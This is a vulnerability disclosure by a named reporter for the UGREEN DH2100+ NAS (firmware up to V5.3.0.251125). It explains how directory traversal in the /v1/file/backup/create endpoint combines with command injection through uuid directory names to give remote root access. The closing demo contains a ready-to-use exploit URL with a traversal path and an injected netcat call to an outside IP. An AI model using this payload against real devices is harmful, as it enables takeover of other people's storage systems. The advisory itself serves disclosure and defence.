Information

Vendor: UGREEN (https://www.ugnas.com/)

Affected Product: DH2100+ NAS ≤ V5.3.0.251125

Reporter: Jincheng Wang (@winmt, wjcwinmt@gmail.com)

Description

A remote command execution vulnerability exists in the UGREEN DH2100+ NAS device. This vulnerability arises from a combination of arbitrary directory creation and command injection vulnerabilities. An attacker can send a specially crafted message to the /v1/file/backup/create endpoint, creating a uuid directory through directory traversal in the path field, and injecting malicious commands into the directory name (i.e., uuid name), thereby gaining ROOT control of the remote target NAS device.

Details

In the binary file /data/nas_server/nas_svr, within the handler_file_backup_create function corresponding to the /v1/file/backup/create endpoint, the path field is retrieved and stored in v37.

image.png

Next, the path field will be appended to the complete path.

image.png

Then, if the path is detected as non-existent, the create_path function is called to create this directory.

image.png

Clearly, there is a directory traversal vulnerability here, which allows the creation of arbitrary directory under any path.

The /mnt/media_rw directory stores the uuids (disk numbers) of the RAID disks. This NAS device system continuously monitors the disk status. If it detects that a disk corresponding to a certain uuid is missing (i.e., removed), it will broadcast the following command.

image.png

Therefore, a directory with a name containing arbitrary malicious commands can be created under /mnt/media_rw as a uuid. The disk corresponding to this uuid obviously does not exist, so the command here will be triggered immediately, thereby completing command injection, executing arbitrary commands on the remote target NAS device, and gaining the highest ROOT privilege.

Demo

An attacker can request the following URL to a remote target NAS device.

<http://xxx:9999/v1/file/backup/create?api_token=ZmQwMTA4MjA4MzlmZWY2MTMzZTZhZmYxNmRiNjFlMTgxMDBhZmFlMw%3D%3D&uuid=4b7987d4-a92b-41bf-9fc2-d18b03023cff&id=hacker&alias=winmt&path=**../../../../../../../mnt/media_rw/'$>(nc 192.168.31.167 8888)'**